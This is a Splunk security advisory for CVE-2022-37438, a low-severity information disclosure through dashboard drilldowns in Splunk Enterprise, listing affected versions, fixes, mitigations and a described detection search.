Information disclosure via the dashboard drilldown in Splunk Enterprise
Advisory ID: SVD-2022-0802
CVE ID: CVE-2022-37438
Published: 2022-08-16
Last Update: 2022-08-16
CVSSv3.1 Score: 2.6, Low
CVSSv3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N
CWE: CWE-200
Bug ID: SPL-221531
Description
In Splunk Enterprise versions in the following table, an authenticated user can craft a dashboard that could potentially leak information (for example, username, email, and real name) about Splunk users, when visited by another user through the drilldown component. The vulnerability requires user access to create and share dashboards using Splunk Web.
Solution
For Splunk Enterprise, upgrade versions to 8.1.11, 8.2.7.1, 9.0.1, or higher.
For Splunk Cloud Platform customers, Splunk is actively patching and monitoring Splunk Cloud instances.
Product Status
| Product | Version | Component | Affected Version | Fix Version |
|---|---|---|---|---|
| Splunk Enterprise | 8.1 | Splunk Web | 8.1.10 and lower | 8.1.11 |
| Splunk Enterprise | 8.2 | Splunk Web | 8.2.0 to 8.2.7 | 8.2.7.1 |
| Splunk Enterprise | 9.0 | Splunk Web | 9.0.0 | 9.0.1 |
| Splunk Cloud Platform | Splunk Web | 8.2.2203.4 and lower | 9.0.2205 |
Mitigations and Workarounds
You can mitigate this vulnerability by configuring permissions for dashboards and the knowledge objects that drive them.
Detections
This search uses REST functionality to query for dashboards with environment variables present in URL options that could potentially leak information about Splunk users. If an analyst sees results from this search we suggest investigating to determine if the disclosure of these environmental variables was intended.
Severity
Splunk rates the severity as Low, 2.6 with the vector CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N. If the Splunk Enterprise instance disabled Splunk Web, it is not impacted and the vulnerability is informational.
Acknowledgments
Eric LaMothe at Splunk